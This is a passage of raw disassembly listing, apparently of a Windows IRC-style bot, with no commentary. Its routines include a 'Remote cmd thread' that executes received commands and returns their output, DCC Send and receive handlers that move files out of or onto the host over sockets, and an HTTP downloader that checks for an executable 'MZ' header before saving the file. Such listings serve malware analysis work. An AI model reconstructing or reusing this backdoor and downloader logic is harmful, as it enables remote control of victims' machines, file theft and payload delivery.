loc_401CCD: ; CODE XREF: sub_401981+343�j
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 0
lea eax, [ebp+var_31C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_204]
push eax
push dword_41DEB4
call dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401981+383�j
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: sub_401981+238�j
; sub_401981+291�j ...
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: sub_401981+67�j
; sub_401981+BB�j ...
leave
retn 4
sub_401981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push dword_41DEB0
call dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call dword_4171D0 ; ShellExecuteA
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset sub_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; strcat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E38 proc near ; DATA XREF: sub_4024F3+10B�o
var_614 = qword ptr -614h
var_60C = qword ptr -60Ch
var_604 = dword ptr -604h
var_600 = dword ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_5E4 = dword ptr -5E4h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5BB = byte ptr -5BBh
var_4B7 = byte ptr -4B7h
var_3B7 = byte ptr -3B7h
var_3AD = byte ptr -3ADh
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_5E0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_5BB]
push eax
call dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_5BB]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_5E4], eax
cmp [ebp+var_5E4], 0
jnz short loc_401EA3
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401E38+56�j
push 2710h
push 0
lea eax, [ebp+var_3B7]
push eax
lea eax, [ebp+var_4B7]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_401EEE
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: sub_401E38+95�j
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
mov eax, [ebp+var_5E0]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_5E8], eax
and [ebp+var_204], 0
loc_401F2A: ; CODE XREF: sub_401E38:loc_401FD8�j
push 0
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+var_208]
call dword_417248 ; recv
mov [ebp+var_5F0], eax
cmp [ebp+var_5F0], 0
jz short loc_401F5F
cmp [ebp+var_5F0], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: sub_401E38+119�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401E38+125�j
mov eax, [ebp+var_204]
add eax, [ebp+var_5F0]
mov [ebp+var_204], eax
push [ebp+var_204]
call dword_41724C ; ntohl
mov [ebp+var_5F4], eax
push 4
lea eax, [ebp+var_5F4]
push eax
push [ebp+var_208]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5E4]
push [ebp+var_5F0]
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp [ebp+var_5F0], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: sub_401E38+18B�j
mov eax, [ebp+var_5E0]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: sub_401E38+199�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401E38:loc_401F5F�j
; sub_401E38+18D�j
push [ebp+var_5E4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_5EC], eax
call sub_416B64 ; clock
cmp [ebp+var_5E8], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp+var_5E8], eax
loc_402008: ; CODE XREF: sub_401E38+1C2�j
mov eax, [ebp+var_5EC]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_5F8], eax
fild [ebp+var_5F8]
fstp [ebp+var_5FC]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_600], eax
fild [ebp+var_600]
fdiv flt_417270
fdivr [ebp+var_5FC]
push ecx
push ecx
fstp [esp+60Ch+var_60C]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_604], eax
fild [ebp+var_604]
fdiv flt_417270
push ecx
push ecx
fstp [esp+614h+var_614]
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
push offset dword_418234
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: sub_401E38:loc_4020BC�j
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_208]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401E38+19B�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: sub_401E38+66�j
; sub_401E38+B1�j ...
leave
retn 4
sub_401E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C2 proc near ; DATA XREF: sub_40260D+7C�o
var_A2C = qword ptr -0A2Ch
var_A24 = qword ptr -0A24h
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_9FC = dword ptr -9FCh
var_9F8 = dword ptr -9F8h
var_9F4 = dword ptr -9F4h
var_9F0 = byte ptr -9F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8BF = byte ptr -8BFh
var_8BE = byte ptr -8BEh
var_7BB = byte ptr -7BBh
var_618 = dword ptr -618h
var_614 = byte ptr -614h
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_8E4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_8BF]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_9F8], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: sub_4020C2:loc_40215E�j
mov eax, [ebp+var_9F8]
dec eax
mov [ebp+var_9F8], eax
loc_40210D: ; CODE XREF: sub_4020C2+3C�j
cmp [ebp+var_9F8], 0
jnz short loc_40212D
lea eax, [ebp+var_8BF]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: sub_4020C2+52�j
mov eax, [ebp+var_9F8]
movsx eax, [ebp+eax+var_8BF]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp+var_9F8]
lea eax, [ebp+eax+var_8BE]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020C2+7C�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: sub_4020C2+69�j
; sub_4020C2+9A�j
mov [ebp+var_8E8], 10h
lea eax, [ebp+var_8E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40CF25
push eax
call dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_614]
push eax
push [ebp+var_8E8]
lea eax, [ebp+var_10]
push eax
call dword_41DF18 ; getnameinfo
test eax, eax
jz short loc_4021BA
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_4020C2+E3�j
push 0Ah
lea eax, [ebp+var_A04]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp+var_A04]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_9FC], eax
cmp [ebp+var_9FC], 0
jnz short loc_40220F
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: sub_4020C2+138�j
push offset aRb ; "rb"
lea eax, [ebp+var_8BF]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8EC], eax
cmp [ebp+var_8EC], 0
jnz short loc_402250
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: sub_4020C2+16D�j
push 2
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_8EC]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_A08], eax
push 0
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp+var_8E0]
push eax
loc_4022A0: ; DATA XREF: sub_42F670+2E�w
call sub_40D420
add esp, 10h
push [ebp+var_A08]
lea eax, [ebp+var_A04]
push eax
lea eax, [ebp+var_614]
push eax
call dword_417244 ; inet_addr
push eax
call dword_41724C ; ntohl
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_418348
lea eax, [ebp+var_8E0]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push [ebp+var_9FC]
call sub_4048EF
pop ecx
pop ecx
loc_4022F7: ; DATA XREF: sub_42F601�w
; sub_42F601+29�r
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jz short loc_40230F
cmp [ebp+var_618], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: sub_4020C2+242�j
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_4020C2+24B�j
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
mov eax, [ebp+var_8E4]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_9F4], eax
loc_40236F: ; CODE XREF: sub_4020C2:loc_40240D�j
push [ebp+var_8EC]
push 200h
push 1
lea eax, [ebp+var_210]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_A0C], eax
cmp [ebp+var_A0C], 0
jz short loc_4023A6
cmp [ebp+var_A0C], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: sub_4020C2+2D6�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: sub_4020C2+2E2�j
push [ebp+var_A0C]
lea eax, [ebp+var_210]
push eax
push [ebp+var_618]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182F4
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_4020C2+303�j
cmp [ebp+var_A0C], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: sub_4020C2+336�j
mov eax, [ebp+var_8E4]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4020C2+344�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_4020C2:loc_4023A6�j
; sub_4020C2+338�j
call sub_416B64 ; clock
cmp [ebp+var_9F4], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp+var_9F4], eax
loc_40242B: ; CODE XREF: sub_4020C2+35B�j
mov eax, [ebp+var_A08]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_A10], eax
fild [ebp+var_A10]
fstp [ebp+var_A14]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A18], eax
fild [ebp+var_A18]
fdiv flt_417270
fdivr [ebp+var_A14]
push ecx
push ecx
fstp [esp+0A24h+var_A24]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A1C], eax
fild [ebp+var_A1C]
fdiv flt_417270
push ecx
push ecx
fstp [esp+0A2Ch+var_A2C]
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182B0
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: sub_4020C2:loc_4024EB�j
; sub_4020C2:loc_4024ED�j
push [ebp+var_618]
call sub_40538D
pop ecx
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4020C2+346�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: sub_4020C2+327�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: sub_4020C2+F3�j
; sub_4020C2+148�j ...
leave
retn 4
sub_4020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset sub_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset sub_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: sub_402A32+5C9�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_402A32+625�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2B proc near ; CODE XREF: sub_402A32+673�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; =============== S U B R O U T I N E =======================================
